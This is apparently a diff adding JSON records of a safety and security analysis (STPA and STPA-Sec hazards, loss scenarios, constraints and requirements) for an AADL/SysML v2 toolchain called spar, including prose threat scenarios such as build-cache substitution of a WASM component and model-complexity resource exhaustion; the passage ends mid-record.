+      "description": "\nAn adversary supplies a model with exponential expansion\n\ncharacteristics (deeply nested generics,\nrecursive SysML v2\n\nspecializations,\nlarge array dimensions) that causes the codegen\n\nor verification pipeline to consume unbounded resources,\npreventing\n\nlegitimate verification from completing.\n",
+      "id": "L-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Denial of verification through model complexity attack",
+      "type": "loss"
+    },
+    {
+      "description": "\nNames and values extracted from input models must be sanitized\n\nbefore interpolation into any generated source file,\nconfiguration\n\nfile,\nor build file. Sanitization must be specific to the target\n\nlanguage (Rust,\nWIT,\nLean4,\nTOML,\nStarlark).\n",
+      "id": "SC-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "No code injection through model-derived identifiers",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe SysML v2 to AADL lowering transformation produces AADL\n\nconstructs that are syntactically valid but semantically wrong\n\n(e.g.,\nwrong component category,\nlost property constraints,\n\nmissing connections). The resulting AADL model passes all 21\n\nanalysis passes but does not faithfully represent the original\n\nSysML v2 design intent.\n",
+      "id": "H-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering produces semantically incorrect AADL",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "UCA-12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis emits wrong severity",
+      "type": "uca"
+    },
+    {
+      "description": "arinc653.rs validates partition window scheduling, inter-partition communication isolation, and process-to-partition bindings.\n",
+      "id": "COVERAGE-CH13",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.13: ARINC 653 partition scheduling",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA developer adds array_index to InstanceNode but the serializable\n\nprojection (used for JSON output) is a separate struct that was\n\nnot updated. The internal model has array indices. The JSON output\n\ndoes not. Rivet's AADL adapter receives JSON without array info.\n\nArray components appear as duplicates with the same name.\n",
+      "id": "LS-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "JSON drops new InstanceNode field",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CA-ANALYZE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Run analysis passes",
+      "type": "control-action"
+    },
+    {
+      "description": "The match in lower_section_with_visibility now explicitly lists all non-semantic SyntaxKind variants (ERROR, WHITESPACE, COMMENT, NAME, END_KW, SEMICOLON, PACKAGE_PROPERTIES, ANNEX_SUBCLAUSE) as no-ops. The catch-all arm emits a warning with the unhandled kind name.\n",
+      "id": "ARCH-003",
+      "links": [
+        {
+          "target": "STPA-REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Explicit match arms replace wildcard in section lowering",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nSerialized JSON or rendered SVG output misrepresents the actual\n\nAADL model,\nleading to incorrect documentation artifacts in the\n\ncertification evidence package.\n",
+      "id": "L-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Incorrect architecture documentation",
+      "type": "loss"
+    },
+    {
+      "description": "The CLI and WASM output formatters must transmit all error-severity diagnostics to the user. Filtering by severity must only be available via explicit user flag (--min-severity). The default must show all severities.\n",
+      "id": "STPA-REQ-020",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "output",
+        "stpa"
+      ],
+      "title": "No error diagnostic suppression",
+      "type": "requirement"
+    },
+    {
+      "description": "End-to-end tests for CLI subcommands including LSP, format output, code actions, rename, and formatting.\n",
+      "id": "TEST-CLI",
+      "links": [
+        {
+          "target": "ARCH-CLI",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "CLI integration tests",
+      "type": "feature"
+    },
+    {
+      "description": "All implemented analysis passes must be registered with AnalysisRunner by default. The register_all() function must use compile-time or inventory-based discovery to prevent omission. An integration test must verify the count of registered analyses matches the count of Analysis trait implementations.\n",
+      "id": "STPA-REQ-014",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "analysis",
+        "stpa"
+      ],
+      "title": "Automatic analysis registration",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn adversary supplies a crafted SysML v2 file that exploits the\n\nlowering heuristics to produce AADL output with silently altered\n\nsemantics — wrong component categories,\ndropped connections,\n\ninjected property values — that downstream analysis and codegen\n\ntreat as correct. The resulting architecture has security-relevant\n\ndefects that are invisible to reviewers.\n",
+      "id": "L-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 model injection produces compromised AADL",
+      "type": "loss"
+    },
+    {
+      "description": "lower_constraint_usage_to_property and lower_attribute_usage_to_property currently produce PropertyExpr::Opaque for all values. The planned fix adds value expression parsing: when the attribute/constraint body contains a numeric literal with a unit (e.g., `10 ms`), produce a typed PropertyExpr::IntegerLit or PropertyExpr::RealLit with unit annotation. Opaque remains the fallback for genuinely unparseable expressions.\n",
+      "id": "ARCH-028",
+      "links": [
+        {
+          "target": "STPA-REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Typed property lowering for SysML v2 constraints (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "CLI binary with subcommands: parse, items, instance, analyze, transform, lsp, render. Manual arg parsing.\n",
+      "id": "ARCH-CLI",
+      "links": [
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SERDE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-cli",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CA-CERTIFY",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generate optimality certificate",
+      "type": "control-action"
+    },
+    {
+      "description": "",
+      "id": "CTRL-OUTPUT",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Output Controller (spar-cli, spar-wasm)",
+      "type": "controller"
+    },
+    {
+      "description": "\nAll generated file paths must be validated to resolve within the\n\nspecified output directory. Path traversal sequences must be\n\nrejected.\n",
+      "id": "SC-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated file paths must be confined to output directory",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Solver output applied by constructing TextEdit operations on the AADL source via rowan CST. Insert/update Actual_Processor_Binding, Actual_Memory_Binding, Actual_Connection_Binding properties. Preserves formatting, comments, and all other source content. Changes validated incrementally via salsa before committing.\n",
+      "id": "ARCH-SOLVER-005",
+      "links": [
+        {
+          "target": "REQ-SOLVER-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "solver",
+        "v030"
+      ],
+      "title": "Source rewriting via rowan CST",
+      "type": "design-decision"
+    },
+    {
+      "description": "A DSL for declaring assertions over HIR instance model properties. Users specify constraints (e.g., all threads must have Period set, latency < 100ms) and spar verify evaluates them, reporting pass/fail with evidence.\n",
+      "id": "REQ-VERIFY-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "verification",
+        "properties",
+        "v030"
+      ],
+      "title": "Property assertion rules in spar verify",
+      "type": "requirement"
+    },
+    {
+      "description": "Verify every required port has incoming connections and warn about unconnected features and dangling endpoints.\n",
+      "id": "REQ-ANALYSIS-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis"
+      ],
+      "title": "Connectivity analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "Features, subcomponents, connections, and properties are inherited through extends chains with cycle detection and deduplication.\n",
+      "id": "FEAT-EXTENDS-001",
+      "links": [
+        {
+          "target": "REQ-MODEL-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "instance-model"
+      ],
+      "title": "Type inheritance (extends) resolution",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CTRL-INSTANCE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance Builder (spar-hir-def::instance)",
+      "type": "controller"
+    },
+    {
+      "description": "Before generating code, timing properties must be validated against physical plausibility bounds: Period must be in range [1 us, 1 hr], WCET must be in range [1 ns, Period], Deadline must be in range [WCET, Period]. Properties outside these bounds must produce error diagnostics and halt code generation. Default value substitution (the current 10ms/1ms fallback) must emit a warning diagnostic rather than proceeding silently.\n",
+      "id": "STPA-SEC-REQ-002",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "codegen",
+        "stpa-sec"
+      ],
+      "title": "Property value validation before code generation",
+      "type": "requirement"
+    },
+    {
+      "description": "Detect architectural conflicts in three-way merges where concurrent changes affect the same structural elements (components, connections, bindings) or produce incompatible analysis results.\n",
+      "id": "REQ-DIFF-003",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "diff",
+        "merge",
+        "v040"
+      ],
+      "title": "Three-way merge architectural conflict detection",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-S13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source rewrite output must parse cleanly",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe solver co-locates components of different ASIL/DAL/SIL levels\n\non the same processor or bus without verifying that adequate fault\n\ncontainment mechanisms (partitioning,\ntime/space isolation,\nhealth\n\nmonitoring) are specified in the model.\n",
+      "id": "H-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver allows mixed-criticality without fault containment",
+      "type": "hazard"
+    },
+    {
+      "description": "Compute aggregate bandwidth demand on each bus instance from bound connections and compare against the bus Bandwidth_Capacity property. Report overload when demand exceeds capacity.\n",
+      "id": "REQ-BUS-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "resource",
+        "v030"
+      ],
+      "title": "Bus bandwidth utilization analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-S14",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "All affected files must be rewritten",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Verifies that has_modes() returns true and mode_names() returns the correct list when the instance has SOMs.\n",
+      "id": "VAL-026",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "has_modes and mode_names for modal instance",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Security zone matching must be enforced",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Deployment solver returns not just a valid configuration but a machine-checkable certificate proving it is globally optimal (for exact methods) or within a bounded optimality gap (for heuristics). Uses dual bounds from MILP or exhaustive search proofs from CP-SAT.\n",
+      "id": "REQ-SOLVER-005",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "solver",
+        "verification",
+        "v040"
+      ],
+      "title": "Optimality certificates for deployment solutions",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "WASM component must verify provenance of core module",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Extend the assertion engine to support Resolute-style architecture claims: hierarchical claim decomposition, evidence linking, and reusable claim libraries. Currently spar verify has flat assertions; Resolute supports claim trees with sub-claims and computed evidence.\n",
+      "id": "REQ-RESOLUTE-001",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "verification",
+        "competitive-gap",
+        "v040"
+      ],
+      "title": "Architecture claim language (Resolute-lite)",
+      "type": "requirement"
+    },
+    {
+      "description": "connection_rules.rs validates connection endpoint compatibility. connectivity.rs checks for unconnected required ports.\n",
+      "id": "COVERAGE-CH9",
+      "links": [
+        {
+          "target": "REQ-MODEL-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.9: Connections — well-formedness rules",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that Compute_Execution_Time with min > max (e.g., \"5 ms .. 1 ms\") produces an error diagnostic.\n",
+      "id": "VAL-045",
+      "links": [
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Inverted execution time range produces error",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver produces a binding that exceeds physical resource limits\n\n(memory,\nweight,\npower) because the solver's resource accounting\n\nwas incorrect. The hardware cannot host the assigned software,\nleading\n\nto out-of-memory failures,\noverweight assemblies,\nor power budget\n\nviolations discovered late in integration.\n",
+      "id": "L-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Resource exhaustion in deployed system",
+      "type": "loss"
+    },
+    {
+      "description": "Typed syntax tree wrapper over rowan GreenNode. Defines SyntaxKind enum and typed AST node accessors.\n",
+      "id": "ARCH-SYNTAX",
+      "links": [
+        {
+          "target": "REQ-PARSE-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-syntax",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nGiven the same input model and constraints,\nthe solver produces\n\ndifferent binding configurations on different runs (due to hash\n\nmap ordering,\nfloating-point non-determinism,\nor randomized\n\nheuristics). Engineers cannot reproduce or review results.\n",
+      "id": "H-S7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver produces non-deterministic results",
+      "type": "hazard"
+    },
+    {
+      "description": "For each memory component, sum Code_Size and Data_Size properties of all software components bound to it and compare against Memory_Size. Report budget violations with utilization percentage.\n",
+      "id": "REQ-MEMBUD-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "resource",
+        "v030"
+      ],
+      "title": "Memory budget analysis (Code_Size + Data_Size vs Memory_Size)",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SEC-BUILDGEN",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Build File Generation Controller",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "UCA-S21",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Post-solve validation uses stale cache",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe solver's output — a mapping of software components to hardware\n\nresources,\nprotocol selections,\nand property values.\n",
+      "id": "CP-BINDING",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Deployment Binding Configuration",
+      "type": "controlled-process"
+    },
+    {
+      "description": "The solver must enumerate all connections whose source and destination components are transitively bound to different processors. The enumeration must trace through process containment hierarchy (not just check direct parent binding). Every cross-processor connection must receive a bus binding. A completeness check must verify that no cross-processor connection is unbound after Layer 2 completes.\n",
+      "id": "SOLVER-REQ-011",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "bus-binding",
+        "completeness",
+        "stpa"
+      ],
+      "title": "Complete cross-processor connection enumeration",
+      "type": "requirement"
+    },
+    {
+      "description": "After all solver layers (0-3) produce their results, a mandatory global validation pass must verify: (a) all E2E flow latency budgets are satisfied, (b) total resource budgets (memory, weight, power) across all zones are within limits, (c) safety level decomposition is complete and correct, (d) all cross-processor connections have bus bindings, (e) all processors pass schedulability. The global validation must use the composed solution (not individual layer results) and must report all violations, not just the first one found.\n",
+      "id": "SOLVER-REQ-015",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "global-validation",
+        "composition",
+        "stpa"
+      ],
+      "title": "Global validation after hierarchical composition",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-PARSER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser Controller (spar-parser + spar-syntax)",
+      "type": "controller"
+    },
+    {
+      "description": "Apply solver output by rewriting AADL source via rowan CST manipulation. Insert/update Actual_Processor_Binding, Actual_Memory_Binding, Actual_Connection_Binding properties. Preserve formatting and comments. Validate incrementally via salsa after each change.\n",
+      "id": "REQ-SOLVER-007",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "solver",
+        "refactoring",
+        "v030"
+      ],
+      "title": "Source rewriting to apply deployment solutions",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CA-CODEGEN",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generate code and verification pipeline",
+      "type": "control-action"
+    },
+    {
+      "description": "",
+      "id": "CC-10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analyses must read properties through validated accessors",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAn avionics system has redundant flight control channels (FCC-A,\n\nFCC-B) with anti-affinity constraints requiring them to be on\n\nseparate processors. The solver's Layer 1 does not read\n\nAllowed_Processor_Binding properties and places both channels\n\non the same processor for scheduling efficiency. A single\n\nprocessor failure takes out both flight control channels.\n",
+      "id": "LS-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver ignores Allowed_Processor_Binding constraint",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The wildcard match arm in lower_node (lower.rs) must emit a warning diagnostic for any SyntaxKind that is not whitespace, punctuation, or a known structural wrapper. The diagnostic must include the SyntaxKind name, source offset, and parent context. A golden-file test must verify that all semantic SysML v2 constructs produce either a lowered AADL item or a diagnostic.\n",
+      "id": "STPA-SEC-REQ-004",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "security",
+        "sysml2",
+        "lowering",
+        "stpa-sec"
+      ],
+      "title": "SysML v2 lowering diagnostic for unhandled syntax kinds",
+      "type": "requirement"
+    },
+    {
+      "description": "Check security properties on connections and components: encryption requirements on cross-zone connections, authentication on control interfaces, secure boot chain verification, trust boundary validation. Ellidiss has a security rules checker; OSATE has none. Maps to IEC 62443 zones/conduits and ISO 21434 threat analysis.\n",
+      "id": "REQ-SECURITY-001",
+      "links": [
+        {
+          "target": "REQ-SOLVER-009",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "security",
+        "competitive-gap",
+        "v040"
+      ],
+      "title": "Security rules analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "\nGenerated verification artifacts must cover the same safety\n\nproperties that the generated runtime code depends on. Gaps\n\nbetween verified properties and runtime assumptions must be\n\ndocumented.\n",
+      "id": "SC-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification must cover safety-critical properties",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Deployment optimization uses 4 hierarchical layers analogous to NDS navigation. Layer 0 (Component): RTA/scheduling per processor — already implemented. Layer 1 (Cluster): bin-packing with schedulability validation — FFD/BFD heuristics in pure Rust. Layer 2 (System): topology graph extraction + bus binding optimization — petgraph-based. Layer 3 (Global): cross-zone E2E + safety decomposition — exact solver (MILP/CP-SAT). Local solutions compose into globally valid configurations.\n",
+      "id": "ARCH-SOLVER-001",
+      "links": [
+        {
+          "target": "REQ-SOLVER-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "architecture",
+        "solver",
+        "v040"
+      ],
+      "title": "NDS-layered hierarchical solving",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nWASM components and native binaries produced after\n\nverification and compilation of generated code.\n",
+      "id": "CP-SEC-VERIFIED-ARTIFACTS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verified and Compiled Artifacts",
+      "type": "controlled-process"
+    },
+    {
+      "description": "System, process, thread, thread_group, processor, virtual_processor, memory, bus, virtual_bus, device, subprogram, subprogram_group, data, abstract.\n",
+      "id": "REQ-MODEL-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "model",
+        "as5506-ch5"
+      ],
+      "title": "Support all 14 component categories",
+      "type": "requirement"
+    },
+    {
+      "description": "The check_expr function matches (PropertyExpr, PropertyTypeDef) pairs. Compatible pairs are no-ops. Incompatible pairs push diagnostics. Opaque and ComputedValue expressions skip validation (cannot be type-checked statically). UnitValue delegates to inner expression. TypeRef skips validation (type not resolved at this level).\n",
+      "id": "ARCH-005",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Recursive expression/type matching with skip for opaque values",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-14",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Output must not filter error diagnostics",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The solver must read and enforce Allowed_Processor_Binding (affinity) and Not_Collocated (anti-affinity) properties as hard constraints. Violations must cause the allocation to be rejected, not penalized as soft constraints. When an allocation violates an affinity constraint, the diagnostic must name the constraint, the component, and the conflicting binding.\n",
+      "id": "SOLVER-REQ-007",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "allocation",
+        "constraints",
+        "stpa"
+      ],
+      "title": "Affinity and anti-affinity constraint enforcement",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SOLVER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Deployment Solver (spar-solver)",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "UCA-S14",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewriter deletes existing property",
+      "type": "uca"
+    },
+    {
+      "description": "The solver must not assume default values for missing properties. Specifically: missing Compute_Execution_Time must not default to zero, missing Memory_Size must not default to zero, missing Bandwidth must not default to infinity, missing safety level must not default to \"no safety requirement\". Each missing property must produce an explicit diagnostic. If the engineer provides an explicit default via a solver configuration flag, the solver must emit a warning listing all properties using the override default.\n",
+      "id": "SOLVER-REQ-029",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "completeness",
+        "defaults",
+        "stpa"
+      ],
+      "title": "No silent default assumptions",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CA-PARSE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parse AADL source",
+      "type": "control-action"
+    },
+    {
+      "description": "",
+      "id": "UCA-S16",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewriter does not update all files",
+      "type": "uca"
+    },
+    {
+      "description": "\nA property like Period => 10 ms is lowered to a PropertyExpr with\n\nthe wrong conversion factor (e.g.,\nfactor of 1000 instead of\n\n1_000_000 for ms-to-ps). The scheduling analysis reads Period as\n\n10_000 ps instead of 10_000_000_000 ps. RMA computes utilization\n\nwith a period 1000x smaller than actual,\nreporting a false pass.\n",
+      "id": "LS-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Unit conversion factor wrong for time property",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "All generated code includes three verification layers: (1) build-time #[aadl(...)] attribute checking against model, (2) test-time contract + timing tests, (3) formal Lean4 scheduling proofs + Kani bounded model checking. Per PulseEngine Verification Guide multi-track approach. Code targets feature intersection of Verus/Kani/Lean4/plain Rust.\n",
+      "id": "ARCH-CODEGEN-002",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-VERIFY-BUILD",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-CODEGEN-VERIFY-TEST",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-CODEGEN-VERIFY-PROOF",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "codegen",
+        "verification",
+        "v040"
+      ],
+      "title": "Three-layer verification (build + test + proof)",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe codegen pipeline iterates over all_components() multiple\n\ntimes with no bounds on component count. SysML v2 lowering\n\nprocesses recursive specialization chains without depth limits.\n\nAn adversary can craft models that generate millions of\n\ncomponents,\nexhausting memory or producing terabytes of output.\n",
+      "id": "H-SEC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Model complexity causes resource exhaustion",
+      "type": "hazard"
+    },
+    {
+      "description": "Verifies that a +10% perturbation that crosses a schedulability bound produces a warning about thin timing margins.\n",
+      "id": "VAL-041",
+      "links": [
+        {
+          "target": "STPA-REQ-025",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Sensitivity warning for thin RMA margin",
+      "type": "feature"
+    },
+    {
+      "description": "Bidirectional transforms between AADL and external formats. Currently implements WIT transform. Planned: WAC, wRPC, Rust crate.\n",
+      "id": "ARCH-TRANSFORM",
+      "links": [
+        {
+          "target": "REQ-TRANSFORM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-transform",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe wasm_component rule's first step runs `cargo build` and then\n\nuses `find` to locate the produced .wasm file. An attacker who\n\ncan write to the target directory (e.g.,\nvia a compromised build\n\ncache or shared CI runner) places a backdoored .wasm file in\n\ntarget/{target}/release/deps/ before cargo runs. The `find | head -1`\n\npicks up the attacker's file. The second step (wasm-tools component\n\nnew) packages it into a valid WASM component. The final artifact\n\nhas correct WIT types but backdoored implementation.\n",
+      "id": "LS-SEC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: WASM component substitution via build cache",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CA-SOLVE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solve deployment configuration",
+      "type": "control-action"
+    },
+    {
+      "description": "\nSpar must detect all genuine architectural defects for which it\n\nhas implemented analysis passes. Coverage gaps must be documented.\n",
+      "id": "SC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "No false negatives on safety analyses",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The CI pipeline must include an integration test that runs spar codegen on a representative AADL model, then compiles all generated Rust code with cargo check (and ideally cargo clippy). This test verifies that generated code is syntactically valid Rust. A second test must verify that generated WIT files pass wasm-tools component wit validation.\n",
+      "id": "STPA-SEC-REQ-010",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "security",
+        "codegen",
+        "testing",
+        "stpa-sec"
+      ],
+      "title": "Generated code compilation verification test",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that SchedulingAnalysis emits an Info diagnostic mentioning \"system operation mode\" when the instance has SOMs.\n",
+      "id": "VAL-027",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-013",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Scheduling emits SOM awareness diagnostic",
+      "type": "feature"
+    },
+    {
+      "description": "Public facade over spar-hir-def. Value-oriented API with serde support. All downstream consumers use this crate.\n",
+      "id": "ARCH-HIR",
+      "links": [
+        {
+          "target": "REQ-SERDE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-hir",
+      "type": "design-decision"
+    },
+    {
+      "description": "flow_check.rs validates flow path continuity. flow_rules.rs checks flow spec legality. latency.rs computes best/worst-case latency.\n",
+      "id": "COVERAGE-CH5",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.5: Flows — end-to-end flow analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S17",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate claims optimal when solution is suboptimal",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "UCA-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Allocator ignores affinity constraints",
+      "type": "uca"
+    },
+    {
+      "description": "Each generated crate includes: design document with rivet frontmatter (links to requirements, architecture decisions), verification.yaml with verification-verdict records for each layer. SysML v2 forward compatible link types (satisfies, verifies match SysML v2 satisfy, verify).\n",
+      "id": "REQ-CODEGEN-RIVET",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "rivet",
+        "traceability",
+        "v040"
+      ],
+      "title": "Generate rivet design docs + verification artifacts",
+      "type": "requirement"
+    },
+    {
+      "description": "Analysis coverage is tracked via rivet artifact linking: coverage records in artifacts/requirements.yaml link AS5506 chapters to implemented analysis rules, and rivet validate/coverage commands check completeness.\n",
+      "id": "VERIFY-STPA-COVERAGE",
+      "links": [
+        {
+          "target": "STPA-REQ-022",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis coverage tracking (STPA-REQ-022)",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver selects a virtual bus (communication protocol) for a\n\ncross-processor connection whose actual properties (bandwidth,\n\nlatency,\nsecurity,\nreliability) are worse than what the virtual\n\nbus library claims. Or the solver matches a protocol that meets\n\nnominal requirements but not worst-case.\n",
+      "id": "H-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver selects protocol with insufficient properties",
+      "type": "hazard"
+    },
+    {
+      "description": "Resolve classifier references across files via with clauses. Case-insensitive matching per AADL spec.\n",
+      "id": "REQ-RESOLVE-001",
